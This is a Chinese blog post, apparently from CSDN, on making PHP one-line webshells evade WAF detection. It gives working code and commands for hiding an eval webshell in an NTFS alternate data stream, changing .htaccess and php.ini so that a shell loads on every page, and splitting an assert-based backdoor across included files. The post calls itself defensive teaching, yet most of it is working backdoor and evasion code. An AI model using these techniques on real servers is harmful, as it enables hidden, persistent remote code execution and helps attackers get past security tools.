PHP一句话木马免杀(3)

本文介绍了PHP木马免杀的几种方法,包括ADS隐藏、修改.htaccess文件、调整php.ini配置以及一句话木马的拆分。通过这些组合技巧,可以有效地规避WAF的检测。同时,作者提醒这些知识仅用于信息防御教学,不可用于非法活动。
摘要由CSDN通过智能技术生成

作者:小刚
一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢
本实验仅用于信息防御教学,切勿用于其它用途

免杀小技巧

1.ADS隐藏。

windows数据流有个很好的方式隐藏数据。
通过命令行

echo ^<?php @eval($_POST['pwd']);?^> > shell.php:123.jpg

会在本地生成一个shell.php文件,但打开却发现没有内容,各种方式type啥的都不行。
通过命令行notepad才能打开编辑

notepad shell.php:123.jpg

但此文件无法直接运行。所以需要构造一个文件包含php

<?php include('shell.php:123.jpg');?>

2.修改.htaccess文件

AppType application/x-httpd-php  .jpg #会将本目录下的.jpg文件当做php代码运行。
php_value auto_append_file D:/123.txt #自动包含文件。
php_value auto_append_file .htaccess #包含自己。
#<?php phpinfo();

3.修改php.ini

修改auto_prepend_file = shell.txtauto_append_file= shell.txt
再修改include_path,可以通过任意页面进行访问include_path = ".;D:\phpstudy\www\"
在路徑D:\phpstudy\www\中写入webshell.txt

这样不管在任何页面都会自动加载我们的木马文件。

4.一句话拆分

原理通过文件包含和php的动态函数
拆分为多个文件,然后包含,通过动态函数实现。

在这里插入图片描述

#1.txt
<?php $_ = 'assert';?>
#2.txt
<?php $__='_GET';?>
#3.txt
<?php $___=$$__;?>
#index.php
<?php
include('1.txt');
include('2.txt');
include('3.txt');
@$_($___['xg']);?>

然后将123txt文件散布到各个文件夹,修改include包含的路径。

小结

waf的免杀绕过就是打乱木马的特征。
完全可以通过以上方式打组合拳来进行强力免杀。

自己整理的php免杀资料
在这里插入图片描述
可关注微信公众号:XG小刚
回复:PHP免杀
在这里插入图片描述

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值